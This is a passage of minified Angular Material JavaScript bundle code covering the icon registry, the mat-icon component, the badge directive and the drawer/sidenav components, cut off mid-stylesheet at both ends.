0!==t.trustedTypes&&($3=t.trustedTypes.createPolicy("angular#components",{createHTML:a=>a}))}return $3}())||void 0===a?void 0:a.createHTML(t))||t}function SW(t){return Error(`Unable to find icon with the name "${t}"`)}function kW(t){return Error(`The URL provided to MatIconRegistry was not trusted as a resource URL via Angular's DomSanitizer. Attempted URL was "${t}".`)}function PW(t){return Error(`The literal provided to MatIconRegistry was not trusted as safe HTML by Angular's DomSanitizer. Attempted literal was "${t}".`)}class Cg{constructor(a,e,i){this.url=a,this.svgText=e,this.options=i}}let K3=(()=>{class t{constructor(e,i,n,r){this._httpClient=e,this._sanitizer=i,this._errorHandler=r,this._svgIconConfigs=new Map,this._iconSetConfigs=new Map,this._cachedIconsByUrl=new Map,this._inProgressUrlFetches=new Map,this._fontCssClassesByAlias=new Map,this._resolvers=[],this._defaultFontSetClass=["material-icons","mat-ligature-font"],this._document=n}addSvgIcon(e,i,n){return this.addSvgIconInNamespace("",e,i,n)}addSvgIconLiteral(e,i,n){return this.addSvgIconLiteralInNamespace("",e,i,n)}addSvgIconInNamespace(e,i,n,r){return this._addSvgIconConfig(e,i,new Cg(n,null,r))}addSvgIconResolver(e){return this._resolvers.push(e),this}addSvgIconLiteralInNamespace(e,i,n,r){const c=this._sanitizer.sanitize(oo.HTML,n);if(!c)throw PW(n);const d=tb(c);return this._addSvgIconConfig(e,i,new Cg("",d,r))}addSvgIconSet(e,i){return this.addSvgIconSetInNamespace("",e,i)}addSvgIconSetLiteral(e,i){return this.addSvgIconSetLiteralInNamespace("",e,i)}addSvgIconSetInNamespace(e,i,n){return this._addSvgIconSetConfig(e,new Cg(i,null,n))}addSvgIconSetLiteralInNamespace(e,i,n){const r=this._sanitizer.sanitize(oo.HTML,i);if(!r)throw PW(i);const c=tb(r);return this._addSvgIconSetConfig(e,new Cg("",c,n))}registerFontClassAlias(e,i=e){return this._fontCssClassesByAlias.set(e,i),this}classNameForFontAlias(e){return this._fontCssClassesByAlias.get(e)||e}setDefaultFontSetClass(...e){return this._defaultFontSetClass=e,this}getDefaultFontSetClass(){return this._defaultFontSetClass}getSvgIconFromUrl(e){const i=this._sanitizer.sanitize(oo.RESOURCE_URL,e);if(!i)throw kW(e);const n=this._cachedIconsByUrl.get(i);return n?Bi(X3(n)):this._loadSvgIconFromConfig(new Cg(e,null)).pipe(qr(r=>this._cachedIconsByUrl.set(i,r)),Xe(r=>X3(r)))}getNamedSvgIcon(e,i=""){const n=OW(i,e);let r=this._svgIconConfigs.get(n);if(r)return this._getSvgFromConfig(r);if(r=this._getIconConfigFromResolvers(i,e),r)return this._svgIconConfigs.set(n,r),this._getSvgFromConfig(r);const c=this._iconSetConfigs.get(i);return c?this._getSvgFromIconSetConfigs(e,c):b1(SW(n))}ngOnDestroy(){this._resolvers=[],this._svgIconConfigs.clear(),this._iconSetConfigs.clear(),this._cachedIconsByUrl.clear()}_getSvgFromConfig(e){return e.svgText?Bi(X3(this._svgElementFromConfig(e))):this._loadSvgIconFromConfig(e).pipe(Xe(i=>X3(i)))}_getSvgFromIconSetConfigs(e,i){const n=this._extractIconWithNameFromAnySet(e,i);return n?Bi(n):$6(i.filter(c=>!c.svgText).map(c=>this._loadSvgIconSetFromConfig(c).pipe(Sh(d=>{const k=`Loading icon set URL: ${this._sanitizer.sanitize(oo.RESOURCE_URL,c.url)} failed: ${d.message}`;return this._errorHandler.handleError(new Error(k)),Bi(null)})))).pipe(Xe(()=>{const c=this._extractIconWithNameFromAnySet(e,i);if(!c)throw SW(e);return c}))}_extractIconWithNameFromAnySet(e,i){for(let n=i.length-1;n>=0;n--){const r=i[n];if(r.svgText&&r.svgText.toString().indexOf(e)>-1){const c=this._svgElementFromConfig(r),d=this._extractSvgIconFromSet(c,e,r.options);if(d)return d}}return null}_loadSvgIconFromConfig(e){return this._fetchIcon(e).pipe(qr(i=>e.svgText=i),Xe(()=>this._svgElementFromConfig(e)))}_loadSvgIconSetFromConfig(e){return e.svgText?Bi(null):this._fetchIcon(e).pipe(qr(i=>e.svgText=i))}_extractSvgIconFromSet(e,i,n){const r=e.querySelector(`[id="${i}"]`);if(!r)return null;const c=r.cloneNode(!0);if(c.removeAttribute("id"),"svg"===c.nodeName.toLowerCase())return this._setSvgAttributes(c,n);if("symbol"===c.nodeName.toLowerCase())return this._setSvgAttributes(this._toSvgElement(c),n);const d=this._svgElementFromString(tb("<svg></svg>"));return d.appendChild(c),this._setSvgAttributes(d,n)}_svgElementFromString(e){const i=this._document.createElement("DIV");i.innerHTML=e;const n=i.querySelector("svg");if(!n)throw Error("<svg> tag not found");return n}_toSvgElement(e){const i=this._svgElementFromString(tb("<svg></svg>")),n=e.attributes;for(let r=0;r<n.length;r++){const{name:c,value:d}=n[r];"id"!==c&&i.setAttribute(c,d)}for(let r=0;r<e.childNodes.length;r++)e.childNodes[r].nodeType===this._document.ELEMENT_NODE&&i.appendChild(e.childNodes[r].cloneNode(!0));return i}_setSvgAttributes(e,i){return e.setAttribute("fit",""),e.setAttribute("height","100%"),e.setAttribute("width","100%"),e.setAttribute("preserveAspectRatio","xMidYMid meet"),e.setAttribute("focusable","false"),i&&i.viewBox&&e.setAttribute("viewBox",i.viewBox),e}_fetchIcon(e){var i;const{url:n,options:r}=e,c=null!==(i=null==r?void 0:r.withCredentials)&&void 0!==i&&i;if(!this._httpClient)throw function Kpe(){return Error("Could not find HttpClient provider for use with Angular Material icons. Please include the HttpClientModule from @angular/common/http in your app imports.")}();if(null==n)throw Error(`Cannot fetch icon from URL "${n}".`);const d=this._sanitizer.sanitize(oo.RESOURCE_URL,n);if(!d)throw kW(n);const T=this._inProgressUrlFetches.get(d);if(T)return T;const k=this._httpClient.get(d,{responseType:"text",withCredentials:c}).pipe(Xe(q=>tb(q)),U4(()=>this._inProgressUrlFetches.delete(d)),Bd());return this._inProgressUrlFetches.set(d,k),k}_addSvgIconConfig(e,i,n){return this._svgIconConfigs.set(OW(e,i),n),this}_addSvgIconSetConfig(e,i){const n=this._iconSetConfigs.get(e);return n?n.push(i):this._iconSetConfigs.set(e,[i]),this}_svgElementFromConfig(e){if(!e.svgElement){const i=this._svgElementFromString(e.svgText);this._setSvgAttributes(i,e.options),e.svgElement=i}return e.svgElement}_getIconConfigFromResolvers(e,i){for(let n=0;n<this._resolvers.length;n++){const r=this._resolvers[n](i,e);if(r)return Ype(r)?new Cg(r.url,null,r.options):new Cg(r,null)}}}return t.\u0275fac=function(e){return new(e||t)(At(op,8),At(cy),At(ga,8),At(yh))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function X3(t){return t.cloneNode(!0)}function OW(t,a){return t+":"+a}function Ype(t){return!(!t.url||!t.options)}const Jpe=Pd(class{constructor(t){this._elementRef=t}}),Zpe=new ni("MAT_ICON_DEFAULT_OPTIONS"),e_e=new ni("mat-icon-location",{providedIn:"root",factory:function t_e(){const t=Po(ga),a=t?t.location:null;return{getPathname:()=>a?a.pathname+a.search:""}}}),NW=["clip-path","color-profile","src","cursor","fill","filter","marker","marker-start","marker-mid","marker-end","mask","stroke"],i_e=NW.map(t=>`[${t}]`).join(", "),a_e=/^url\(['"]?#(.*?)['"]?\)$/;let oa=(()=>{class t extends Jpe{constructor(e,i,n,r,c,d){super(e),this._iconRegistry=i,this._location=r,this._errorHandler=c,this._inline=!1,this._previousFontSetClass=[],this._currentIconFetch=I.EMPTY,d&&(d.color&&(this.color=this.defaultColor=d.color),d.fontSet&&(this.fontSet=d.fontSet)),n||e.nativeElement.setAttribute("aria-hidden","true")}get inline(){return this._inline}set inline(e){this._inline=wi(e)}get svgIcon(){return this._svgIcon}set svgIcon(e){e!==this._svgIcon&&(e?this._updateSvgIcon(e):this._svgIcon&&this._clearSvgElement(),this._svgIcon=e)}get fontSet(){return this._fontSet}set fontSet(e){const i=this._cleanupFontValue(e);i!==this._fontSet&&(this._fontSet=i,this._updateFontIconClasses())}get fontIcon(){return this._fontIcon}set fontIcon(e){const i=this._cleanupFontValue(e);i!==this._fontIcon&&(this._fontIcon=i,this._updateFontIconClasses())}_splitIconName(e){if(!e)return["",""];const i=e.split(":");switch(i.length){case 1:return["",i[0]];case 2:return i;default:throw Error(`Invalid icon name: "${e}"`)}}ngOnInit(){this._updateFontIconClasses()}ngAfterViewChecked(){const e=this._elementsWithExternalReferences;if(e&&e.size){const i=this._location.getPathname();i!==this._previousPath&&(this._previousPath=i,this._prependPathToReferences(i))}}ngOnDestroy(){this._currentIconFetch.unsubscribe(),this._elementsWithExternalReferences&&this._elementsWithExternalReferences.clear()}_usingFontIcon(){return!this.svgIcon}_setSvgElement(e){this._clearSvgElement();const i=this._location.getPathname();this._previousPath=i,this._cacheChildrenWithExternalReferences(e),this._prependPathToReferences(i),this._elementRef.nativeElement.appendChild(e)}_clearSvgElement(){const e=this._elementRef.nativeElement;let i=e.childNodes.length;for(this._elementsWithExternalReferences&&this._elementsWithExternalReferences.clear();i--;){const n=e.childNodes[i];(1!==n.nodeType||"svg"===n.nodeName.toLowerCase())&&n.remove()}}_updateFontIconClasses(){if(!this._usingFontIcon())return;const e=this._elementRef.nativeElement,i=(this.fontSet?this._iconRegistry.classNameForFontAlias(this.fontSet).split(/ +/):this._iconRegistry.getDefaultFontSetClass()).filter(n=>n.length>0);this._previousFontSetClass.forEach(n=>e.classList.remove(n)),i.forEach(n=>e.classList.add(n)),this._previousFontSetClass=i,this.fontIcon!==this._previousFontIconClass&&!i.includes("mat-ligature-font")&&(this._previousFontIconClass&&e.classList.remove(this._previousFontIconClass),this.fontIcon&&e.classList.add(this.fontIcon),this._previousFontIconClass=this.fontIcon)}_cleanupFontValue(e){return"string"==typeof e?e.trim().split(" ")[0]:e}_prependPathToReferences(e){const i=this._elementsWithExternalReferences;i&&i.forEach((n,r)=>{n.forEach(c=>{r.setAttribute(c.name,`url('${e}#${c.value}')`)})})}_cacheChildrenWithExternalReferences(e){const i=e.querySelectorAll(i_e),n=this._elementsWithExternalReferences=this._elementsWithExternalReferences||new Map;for(let r=0;r<i.length;r++)NW.forEach(c=>{const d=i[r],T=d.getAttribute(c),k=T?T.match(a_e):null;if(k){let q=n.get(d);q||(q=[],n.set(d,q)),q.push({name:c,value:k[1]})}})}_updateSvgIcon(e){if(this._svgNamespace=null,this._svgName=null,this._currentIconFetch.unsubscribe(),e){const[i,n]=this._splitIconName(e);i&&(this._svgNamespace=i),n&&(this._svgName=n),this._currentIconFetch=this._iconRegistry.getNamedSvgIcon(n,i).pipe(Cn(1)).subscribe(r=>this._setSvgElement(r),r=>{this._errorHandler.handleError(new Error(`Error retrieving icon ${i}:${n}! ${r.message}`))})}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(K3),Vr("aria-hidden"),Ee(e_e),Ee(yh),Ee(Zpe,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-icon"]],hostAttrs:["role","img",1,"mat-icon","notranslate"],hostVars:8,hostBindings:function(e,i){2&e&&(Rt("data-mat-icon-type",i._usingFontIcon()?"font":"svg")("data-mat-icon-name",i._svgName||i.fontIcon)("data-mat-icon-namespace",i._svgNamespace||i.fontSet)("fontIcon",i._usingFontIcon()?i.fontIcon:null),Ct("mat-icon-inline",i.inline)("mat-icon-no-color","primary"!==i.color&&"accent"!==i.color&&"warn"!==i.color))},inputs:{color:"color",inline:"inline",svgIcon:"svgIcon",fontSet:"fontSet",fontIcon:"fontIcon"},exportAs:["matIcon"],features:[ci],ngContentSelectors:Qpe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},styles:[".mat-icon{-webkit-user-select:none;user-select:none;background-repeat:no-repeat;display:inline-block;fill:currentColor;height:24px;width:24px;overflow:hidden}.mat-icon.mat-icon-inline{font-size:inherit;height:inherit;line-height:inherit;width:inherit}.mat-icon.mat-ligature-font[fontIcon]::before{content:attr(fontIcon)}[dir=rtl] .mat-icon-rtl-mirror{transform:scale(-1, 1)}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon{display:block}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button .mat-icon{margin:auto}"],encapsulation:2,changeDetection:0}),t})(),ib=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),n_e=0;const o_e=Zc(class{}),LW="mat-badge-content";let Hh=(()=>{class t extends o_e{constructor(e,i,n,r,c){super(),this._ngZone=e,this._elementRef=i,this._ariaDescriber=n,this._renderer=r,this._animationMode=c,this._color="primary",this._overlap=!0,this.position="above after",this.size="medium",this._id=n_e++,this._isInitialized=!1}get color(){return this._color}set color(e){this._setColor(e),this._color=e}get overlap(){return this._overlap}set overlap(e){this._overlap=wi(e)}get content(){return this._content}set content(e){this._updateRenderedContent(e)}get description(){return this._description}set description(e){this._updateHostAriaDescription(e)}get hidden(){return this._hidden}set hidden(e){this._hidden=wi(e)}isAbove(){return-1===this.position.indexOf("below")}isAfter(){return-1===this.position.indexOf("before")}getBadgeElement(){return this._badgeElement}ngOnInit(){this._clearExistingBadges(),this.content&&!this._badgeElement&&(this._badgeElement=this._createBadgeElement(),this._updateRenderedContent(this.content)),this._isInitialized=!0}ngOnDestroy(){this._renderer.destroyNode&&this._renderer.destroyNode(this._badgeElement),this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this.description)}_createBadgeElement(){const e=this._renderer.createElement("span"),i="mat-badge-active";return e.setAttribute("id",`mat-badge-content-${this._id}`),e.setAttribute("aria-hidden","true"),e.classList.add(LW),"NoopAnimations"===this._animationMode&&e.classList.add("_mat-animation-noopable"),this._elementRef.nativeElement.appendChild(e),"function"==typeof requestAnimationFrame&&"NoopAnimations"!==this._animationMode?this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>{e.classList.add(i)})}):e.classList.add(i),e}_updateRenderedContent(e){const i=`${null!=e?e:""}`.trim();this._isInitialized&&i&&!this._badgeElement&&(this._badgeElement=this._createBadgeElement()),this._badgeElement&&(this._badgeElement.textContent=i),this._content=i}_updateHostAriaDescription(e){this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this.description),e&&this._ariaDescriber.describe(this._elementRef.nativeElement,e),this._description=e}_setColor(e){const i=this._elementRef.nativeElement.classList;i.remove(`mat-badge-${this._color}`),e&&i.add(`mat-badge-${e}`)}_clearExistingBadges(){const e=this._elementRef.nativeElement.querySelectorAll(`:scope > .${LW}`);for(const i of Array.from(e))i!==this._badgeElement&&i.remove()}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Pw),Ee(wr),Ee(ar,8))},t.\u0275dir=Ot({type:t,selectors:[["","matBadge",""]],hostAttrs:[1,"mat-badge"],hostVars:20,hostBindings:function(e,i){2&e&&Ct("mat-badge-overlap",i.overlap)("mat-badge-above",i.isAbove())("mat-badge-below",!i.isAbove())("mat-badge-before",!i.isAfter())("mat-badge-after",i.isAfter())("mat-badge-small","small"===i.size)("mat-badge-medium","medium"===i.size)("mat-badge-large","large"===i.size)("mat-badge-hidden",i.hidden||!i.content)("mat-badge-disabled",i.disabled)},inputs:{disabled:["matBadgeDisabled","disabled"],color:["matBadgeColor","color"],overlap:["matBadgeOverlap","overlap"],position:["matBadgePosition","position"],content:["matBadge","content"],description:["matBadgeDescription","description"],size:["matBadgeSize","size"],hidden:["matBadgeHidden","hidden"]},features:[ci]}),t})(),zW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Xy,la,la]}),t})();const WW=["*"],r_e=["content"];function s_e(t,a){if(1&t){const e=Ye();m(0,"div",2),he("click",function(){return be(e),Me(B()._onBackdropClicked())}),u()}2&t&&Ct("mat-drawer-shown",B()._isShowingBackdrop())}function c_e(t,a){1&t&&(m(0,"mat-drawer-content"),va(1,2),u())}const l_e=[[["mat-drawer"]],[["mat-drawer-content"]],"*"],d_e=["mat-drawer","mat-drawer-content","*"],m_e={transformDrawer:nr("transform",[sn("open, open-instant",zi({transform:"none",visibility:"visible"})),sn("void",zi({"box-shadow":"none",visibility:"hidden"})),gn("void => open-instant",En("0ms")),gn("void <=> open, open-instant => void",En("400ms cubic-bezier(0.25, 0.8, 0.25, 1)"))])},u_e=new ni("MAT_DRAWER_DEFAULT_AUTOSIZE",{providedIn:"root",factory:function h_e(){return!1}}),FW=new ni("MAT_DRAWER_CONTAINER");let Nd=(()=>{class t extends uw{constructor(e,i,n,r,c){super(n,r,c),this._changeDetectorRef=e,this._container=i}ngAfterContentInit(){this._container._contentMarginChanges.subscribe(()=>{this._changeDetectorRef.markForCheck()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(ja(()=>gu)),Ee(mi),Ee(By),Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer-content"]],hostAttrs:[1,"mat-drawer-content"],hostVars:4,hostBindings:function(e,i){2&e&&ri("margin-left",i._container._contentMargins.left,"px")("margin-right",i._container._contentMargins.right,"px")},features:[ki([{provide:uw,useExisting:t}]),ci],ngContentSelectors:WW,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2,changeDetection:0}),t})(),_u=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this._elementRef=e,this._focusTrapFactory=i,this._focusMonitor=n,this._platform=r,this._ngZone=c,this._interactivityChecker=d,this._doc=T,this._container=k,this._elementFocusedBeforeDrawerWasOpened=null,this._enableAnimations=!1,this._position="start",this._mode="over",this._disableClose=!1,this._opened=!1,this._animationStarted=new J,this._animationEnd=new J,this._animationState="void",this.openedChange=new Tt(!0),this._openedStream=this.openedChange.pipe(Dn(q=>q),Xe(()=>{})),this.openedStart=this._animationStarted.pipe(Dn(q=>q.fromState!==q.toState&&0===q.toState.indexOf("open")),H4(void 0)),this._closedStream=this.openedChange.pipe(Dn(q=>!q),Xe(()=>{})),this.closedStart=this._animationStarted.pipe(Dn(q=>q.fromState!==q.toState&&"void"===q.toState),H4(void 0)),this._destroyed=new J,this.onPositionChanged=new Tt,this._modeChanged=new J,this.openedChange.subscribe(q=>{q?(this._doc&&(this._elementFocusedBeforeDrawerWasOpened=this._doc.activeElement),this._takeFocus()):this._isFocusWithinDrawer()&&this._restoreFocus(this._openedVia||"program")}),this._ngZone.runOutsideAngular(()=>{Tc(this._elementRef.nativeElement,"keydown").pipe(Dn(q=>27===q.keyCode&&!this.disableClose&&!es(q)),ea(this._destroyed)).subscribe(q=>this._ngZone.run(()=>{this.close(),q.stopPropagation(),q.preventDefault()}))}),this._animationEnd.pipe(Bh((q,Y)=>q.fromState===Y.fromState&&q.toState===Y.toState)).subscribe(q=>{const{fromState:Y,toState:te}=q;(0===te.indexOf("open")&&"void"===Y||"void"===te&&0===Y.indexOf("open"))&&this.openedChange.emit(this._opened)})}get position(){return this._position}set position(e){(e="end"===e?"end":"start")!==this._position&&(this._isAttached&&this._updatePositionInParent(e),this._position=e,this.onPositionChanged.emit())}get mode(){return this._mode}set mode(e){this._mode=e,this._updateFocusTrapState(),this._modeChanged.next()}get disableClose(){return this._disableClose}set disableClose(e){this._disableClose=wi(e)}get autoFocus(){const e=this._autoFocus;return null==e?"side"===this.mode?"dialog":"first-tabbable":e}set autoFocus(e){("true"===e||"false"===e||null==e)&&(e=wi(e)),this._autoFocus=e}get opened(){return this._opened}set opened(e){this.toggle(wi(e))}_forceFocus(e,i){this._interactivityChecker.isFocusable(e)||(e.tabIndex=-1,this._ngZone.runOutsideAngular(()=>{const n=()=>{e.removeEventListener("blur",n),e.removeEventListener("mousedown",n),e.removeAttribute("tabindex")};e.addEventListener("blur",n),e.addEventListener("mousedown",n)})),e.focus(i)}_focusByCssSelector(e,i){let n=this._elementRef.nativeElement.querySelector(e);n&&this._forceFocus(n,i)}_takeFocus(){if(!this._focusTrap)return;const e=this._elementRef.nativeElement;switch(this.autoFocus){case!1:case"dialog":return;case!0:case"first-tabbable":this._focusTrap.focusInitialElementWhenReady().then(i=>{!i&&"function"==typeof this._elementRef.nativeElement.focus&&e.focus()});break;case"first-heading":this._focusByCssSelector('h1, h2, h3, h4, h5, h6, [role="heading"]');break;default:this._focusByCssSelector(this.autoFocus)}}_restoreFocus(e){"dialog"!==this.autoFocus&&(this._elementFocusedBeforeDrawerWasOpened?this._focusMonitor.focusVia(this._elementFocusedBeforeDrawerWasOpened,e):this._elementRef.nativeElement.blur(),this._elementFocusedBeforeDrawerWasOpened=null)}_isFocusWithinDrawer(){const e=this._doc.activeElement;return!!e&&this._elementRef.nativeElement.contains(e)}ngAfterViewInit(){this._isAttached=!0,this._focusTrap=this._focusTrapFactory.create(this._elementRef.nativeElement),this._updateFocusTrapState(),"end"===this._position&&this._updatePositionInParent("end")}ngAfterContentChecked(){this._platform.isBrowser&&(this._enableAnimations=!0)}ngOnDestroy(){var e;this._focusTrap&&this._focusTrap.destroy(),null===(e=this._anchor)||void 0===e||e.remove(),this._anchor=null,this._animationStarted.complete(),this._animationEnd.complete(),this._modeChanged.complete(),this._destroyed.next(),this._destroyed.complete()}open(e){return this.toggle(!0,e)}close(){return this.toggle(!1)}_closeViaBackdropClick(){return this._setOpen(!1,!0,"mouse")}toggle(e=!this.opened,i){e&&i&&(this._openedVia=i);const n=this._setOpen(e,!e&&this._isFocusWithinDrawer(),this._openedVia||"program");return e||(this._openedVia=null),n}_setOpen(e,i,n){return this._opened=e,e?this._animationState=this._enableAnimations?"open":"open-instant":(this._animationState="void",i&&this._restoreFocus(n)),this._updateFocusTrapState(),new Promise(r=>{this.openedChange.pipe(Cn(1)).subscribe(c=>r(c?"open":"close"))})}_getWidth(){return this._elementRef.nativeElement&&this._elementRef.nativeElement.offsetWidth||0}_updateFocusTrapState(){this._focusTrap&&(this._focusTrap.enabled=this.opened&&"side"!==this.mode)}_updatePositionInParent(e){const i=this._elementRef.nativeElement,n=i.parentNode;"end"===e?(this._anchor||(this._anchor=this._doc.createComment("mat-drawer-anchor"),n.insertBefore(this._anchor,i)),n.appendChild(i)):this._anchor&&this._anchor.parentNode.insertBefore(i,this._anchor)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(js),Ee(cr),Ee(qi),Ee(Ky),Ee(ga,8),Ee(FW,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer"]],viewQuery:function(e,i){if(1&e&&Mi(r_e,5),2&e){let n;Vt(n=Bt())&&(i._content=n.first)}},hostAttrs:["tabIndex","-1",1,"mat-drawer"],hostVars:12,hostBindings:function(e,i){1&e&&GC("@transform.start",function(r){return i._animationStarted.next(r)})("@transform.done",function(r){return i._animationEnd.next(r)}),2&e&&(Rt("align",null),s1("@transform",i._animationState),Ct("mat-drawer-end","end"===i.position)("mat-drawer-over","over"===i.mode)("mat-drawer-push","push"===i.mode)("mat-drawer-side","side"===i.mode)("mat-drawer-opened",i.opened))},inputs:{position:"position",mode:"mode",disableClose:"disableClose",autoFocus:"autoFocus",opened:"opened"},outputs:{openedChange:"openedChange",_openedStream:"opened",openedStart:"openedStart",_closedStream:"closed",closedStart:"closedStart",onPositionChanged:"positionChanged"},exportAs:["matDrawer"],ngContentSelectors:WW,decls:3,vars:0,consts:[["cdkScrollable","",1,"mat-drawer-inner-container"],["content",""]],template:function(e,i){1&e&&(Jn(),m(0,"div",0,1),va(2),u())},dependencies:[uw],encapsulation:2,data:{animation:[m_e.transformDrawer]},changeDetection:0}),t})(),gu=(()=>{class t{constructor(e,i,n,r,c,d=!1,T){this._dir=e,this._element=i,this._ngZone=n,this._changeDetectorRef=r,this._animationMode=T,this._drawers=new Cd,this.backdropClick=new Tt,this._destroyed=new J,this._doCheckSubject=new J,this._contentMargins={left:null,right:null},this._contentMarginChanges=new J,e&&e.change.pipe(ea(this._destroyed)).subscribe(()=>{this._validateDrawers(),this.updateContentMargins()}),c.change().pipe(ea(this._destroyed)).subscribe(()=>this.updateContentMargins()),this._autosize=d}get start(){return this._start}get end(){return this._end}get autosize(){return this._autosize}set autosize(e){this._autosize=wi(e)}get hasBackdrop(){return null==this._backdropOverride?!this._start||"side"!==this._start.mode||!this._end||"side"!==this._end.mode:this._backdropOverride}set hasBackdrop(e){this._backdropOverride=null==e?null:wi(e)}get scrollable(){return this._userContent||this._content}ngAfterContentInit(){this._allDrawers.changes.pipe(Ro(this._allDrawers),ea(this._destroyed)).subscribe(e=>{this._drawers.reset(e.filter(i=>!i._container||i._container===this)),this._drawers.notifyOnChanges()}),this._drawers.changes.pipe(Ro(null)).subscribe(()=>{this._validateDrawers(),this._drawers.forEach(e=>{this._watchDrawerToggle(e),this._watchDrawerPosition(e),this._watchDrawerMode(e)}),(!this._drawers.length||this._isDrawerOpen(this._start)||this._isDrawerOpen(this._end))&&this.updateContentMargins(),this._changeDetectorRef.markForCheck()}),this._ngZone.runOutsideAngular(()=>{this._doCheckSubject.pipe(lp(10),ea(this._destroyed)).subscribe(()=>this.updateContentMargins())})}ngOnDestroy(){this._contentMarginChanges.complete(),this._doCheckSubject.complete(),this._drawers.destroy(),this._destroyed.next(),this._destroyed.complete()}open(){this._drawers.forEach(e=>e.open())}close(){this._drawers.forEach(e=>e.close())}updateContentMargins(){let e=0,i=0;if(this._left&&this._left.opened)if("side"==this._left.mode)e+=this._left._getWidth();else if("push"==this._left.mode){const n=this._left._getWidth();e+=n,i-=n}if(this._right&&this._right.opened)if("side"==this._right.mode)i+=this._right._getWidth();else if("push"==this._right.mode){const n=this._right._getWidth();i+=n,e-=n}e=e||null,i=i||null,(e!==this._contentMargins.left||i!==this._contentMargins.right)&&(this._contentMargins={left:e,right:i},this._ngZone.run(()=>this._contentMarginChanges.next(this._contentMargins)))}ngDoCheck(){this._autosize&&this._isPushed()&&this._ngZone.runOutsideAngular(()=>this._doCheckSubject.next())}_watchDrawerToggle(e){e._animationStarted.pipe(Dn(i=>i.fromState!==i.toState),ea(this._drawers.changes)).subscribe(i=>{"open-instant"!==i.toState&&"NoopAnimations"!==this._animationMode&&this._element.nativeElement.classList.add("mat-drawer-transition"),this.updateContentMargins(),this._changeDetectorRef.markForCheck()}),"side"!==e.mode&&e.openedChange.pipe(ea(this._drawers.changes)).subscribe(()=>this._setContainerClass(e.opened))}_watchDrawerPosition(e){!e||e.onPositionChanged.pipe(ea(this._drawers.changes)).subscribe(()=>{this._ngZone.onMicrotaskEmpty.pipe(Cn(1)).subscribe(()=>{this._validateDrawers()})})}_watchDrawerMode(e){e&&e._modeChanged.pipe(ea(ra(this._drawers.changes,this._destroyed))).subscribe(()=>{this.updateContentMargins(),this._changeDetectorRef.markForCheck()})}_setContainerClass(e){const i=this._element.nativeElement.classList,n="mat-drawer-container-has-open";e?i.add(n):i.remove(n)}_validateDrawers(){this._start=this._end=null,this._drawers.forEach(e=>{"end"==e.position?this._end=e:this._start=e}),this._right=this._left=null,this._dir&&"rtl"===this._dir.value?(this._left=this._end,this._right=this._start):(this._left=this._start,this._right=this._end)}_isPushed(){return this._isDrawerOpen(this._start)&&"over"!=this._start.mode||this._isDrawerOpen(this._end)&&"over"!=this._end.mode}_onBackdropClicked(){this.backdropClick.emit(),this._closeModalDrawersViaBackdrop()}_closeModalDrawersViaBackdrop(){[this._start,this._end].filter(e=>e&&!e.disableClose&&this._canHaveBackdrop(e)).forEach(e=>e._closeViaBackdropClick())}_isShowingBackdrop(){return this._isDrawerOpen(this._start)&&this._canHaveBackdrop(this._start)||this._isDrawerOpen(this._end)&&this._canHaveBackdrop(this._end)}_canHaveBackdrop(e){return"side"!==e.mode||!!this._backdropOverride}_isDrawerOpen(e){return null!=e&&e.opened}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(mi),Ee(qi),Ee(Ma),Ee(bm),Ee(u_e),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-drawer-container"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,Nd,5),fa(n,_u,5)),2&e){let r;Vt(r=Bt())&&(i._content=r.first),Vt(r=Bt())&&(i._allDrawers=r)}},viewQuery:function(e,i){if(1&e&&Mi(Nd,5),2&e){let n;Vt(n=Bt())&&(i._userContent=n.first)}},hostAttrs:[1,"mat-drawer-container"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-drawer-container-explicit-backdrop",i._backdropOverride)},inputs:{autosize:"autosize",hasBackdrop:"hasBackdrop"},outputs:{backdropClick:"backdropClick"},exportAs:["matDrawerContainer"],features:[ki([{provide:FW,useExisting:t}])],ngContentSelectors:d_e,decls:4,vars:2,consts:[["class","mat-drawer-backdrop",3,"mat-drawer-shown","click",4,"ngIf"],[4,"ngIf"],[1,"mat-drawer-backdrop",3,"click"]],template:function(e,i){1&e&&(Jn(l_e),ne(0,s_e,1,2,"div",0),va(1),va(2,1),ne(3,c_e,2,0,"mat-drawer-content",1)),2&e&&(V("ngIf",i.hasBackdrop),C(3),V("ngIf",!i._content))},dependencies:[Ri,Nd],styles:['.mat-drawer-container{position:relative;z-index:1;box-sizing:border-box;-webkit-overflow-scrolling:touch;display:block;overflow:hidden}.mat-drawer-container[fullscreen]{top:0;left:0;right:0;bottom:0;position:absolute}.mat-drawer-container[fullscreen].mat-drawer-container-has-open{overflow:hidden}.mat-drawer-container.mat-drawer-container-explicit-backdrop .mat-drawer-side{z-index:3}.mat-drawer-container.ng-animate-disabled .mat-drawer-backdrop,.mat-drawer-container.ng-animate-disabled .mat-drawer-content,.ng-animate-disabled .mat-drawer-container .mat-drawer-backdrop,.ng-animate-disabled .mat-drawer-container 